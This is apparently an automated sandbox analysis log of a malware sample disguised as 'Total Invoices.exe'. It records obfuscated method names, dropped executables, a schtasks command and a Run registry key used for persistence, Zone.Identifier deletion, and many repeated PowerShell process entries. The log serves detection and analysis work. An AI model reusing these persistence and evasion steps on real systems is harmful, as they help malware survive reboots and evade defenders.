Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, iJbdw4ZlwaYgFWE45o.cs | High entropy of concatenated method names: 'm84AVgcw2', 'MlamVMrts', 'sbXLEGIYi', 'bEIvEAS0A', 'wjDsvUr0t', 'KaMU0Y96D', 'LoEtXHZDuJwoV8Bl1d', 'nBNxg6k5w4C8TWDIcT', 'xmbNnVcAQ', 'd6kRQuIgJ'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.cs | High entropy of concatenated method names: 'gZEZFIpGDb', 'Om8Z5hq7WG', 'hciZghsqvo', 'znvZPKgH84', 'vVAZuShmAg', 'Ea9Z8nUtff', 'NTZZSeBUrj', 'WU5ZOJWxH2', 'hIEZYHjvkK', 'MNyZfKqSuC'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, roV4m4FiW8Iqy5m7IY.cs | High entropy of concatenated method names: 'bpKuJcqcFH', 'DnMuvu7QAe', 'CYOPINElN7', 'QH5PqYOr6P', 'pdIPjHhqee', 'kIMPGuScZD', 'f8rP65rkKL', 'gSQPwvwUVj', 'py0PVld1ig', 'OMHPBeNc1i'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, R1jScK2BX0NZW28vGm.cs | High entropy of concatenated method names: 'NkFPmJDBQp', 'jv6PLRoqpi', 'PMJPTP5Ioa', 'eICPsQlXbR', 'sDpPkKV3vo', 'Gc8PQvXMw6', 'gcbP9PsSA8', 'JraPNVLD6W', 'YJZPayFLfE', 'JuwPRH7KnT'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, bV0kqGNJKV9MCk2FwgH.cs | High entropy of concatenated method names: 'TZlaM17yXp', 'gguaKZQQol', 'QQjaAmu5Oq', 'D3RamF9uRK', 'zc0aJJNUXR', 'qSaaLUhuBJ', 'vVhavH9XCI', 'ns8aToED4Z', 'Aw9asqoP9t', 'gWwaUfxQCg'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, d5mxGlNuelYhX2W4yxP.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LG1Rpp2LRw', 'mtWRoSpr0V', 'dgrRbGBTS7', 'd6dR02ay5W', 'aqlRD33AB3', 'TmSR7xFhHb', 'AUpRnADZmZ'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, Fop1vsIro4KLWDA10i.cs | High entropy of concatenated method names: 'lwv8FYNQT6', 'aqQ8gDd4Nc', 'U5S8uuIG0v', 'Rbm8SEoNCC', 'C9u8OkYqtx', 'ToduDfHpr5', 'FfFu7k1UVM', 'nlSun4XwEe', 'yGfurdiNiJ', 'SIBuWpPIli'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, i1S4jZmGiGcHh2VLvV.cs | High entropy of concatenated method names: 'soP1TjA4B8', 'TQb1s6T2vS', 'EoE1E7YEmZ', 'zEi1lBltBt', 'CLR1qiHOn2', 's3S1jShCTG', 'Jic16jD40V', 'Ahx1wRLGim', 'bCg1BU9Adm', 'RKB1t1vhT0'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, CrXs7oYO2FVLxbtdIy.cs | High entropy of concatenated method names: 'IUhN5KRB8v', 'PC8NgYWY3C', 'iBnNPn9Qmi', 'I3cNu6NGDa', 'tIPN8YZf7s', 'mNLNSDSLje', 'VkYNOZPx2H', 'VZxNY7nPy0', 'FmYNf6ya8p', 'WJuNXd0b6K'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, InnAJ7csc1jKjsF8ad.cs | High entropy of concatenated method names: 'SH7SMEuPvn', 'XDgSKJ7YLu', 'n76SA7bcmP', 'jACSmyVur5', 'wqLSJCDkBX', 'ShoSLbm3v2', 'f27SvPFRM7', 'AtpSTHrWOq', 'eL4SshApin', 'PRDSUjErTx'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, g3NmbNlXaSiobDsXBy.cs | High entropy of concatenated method names: 'GxMadr4R6C', 'S5taZRw6s1', 'u5FaC2sav9', 'WELa5d8C6d', 'ewDagFbV2G', 'Xa2auscu6p', 'apMa8P8ljG', 'CLyNnjH4p9', 'Aa7NrlRkeo', 'BZ1NWhIpKe'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, iVR7yJzOnBXclf4yqE.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aa5a1URC9g', 'VcuakA9KiD', 'qBWaQs53Wf', 'SPra9cavTQ', 'TD4aNNjL1E', 'AWcaaSdAi7', 'jlgaRmemiy'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, rKLqexOag3LmFqHckP.cs | High entropy of concatenated method names: 'ybgNEN8MS5', 'MKlNlNZSCS', 'WbNNIsdf5u', 'tWRNqDhfno', 'pwGNpEyikQ', 'Qv1NjrKZKi', 'Next', 'Next', 'Next', 'NextBytes'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
Source: C:\Users\user\Desktop\Total Invoices.exe | File created: C:\Users\user\AppData\Roaming\dWXyZYb.exe

                      Boot Survival

Source: C:\Users\user\Desktop\Total Invoices.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTme

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
